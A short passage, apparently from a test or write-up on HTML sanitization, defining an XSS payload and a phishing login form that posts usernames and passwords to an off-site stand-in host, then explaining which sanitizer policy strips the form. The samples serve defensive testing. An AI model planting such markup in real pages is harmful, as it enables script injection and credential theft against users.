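NOTE_PAYLOAD = "<object data=javascript:alert('XSS')></object>"
PHISHING_FORM = ('<form method="POST" action="http://www.mocksite.org/login/login.php">'
                 'Username: <input type="text" name="username" size="15" /><br />'
                 'Password: <input type="password" name="passwort" size="15" /></form>')
```

The policy difference is one line: with the permissive setting the phishing form survives sanitization unchanged, with the on-site restriction nothing of it remains, and a legitimate on-site form such as a search box is untouched either way.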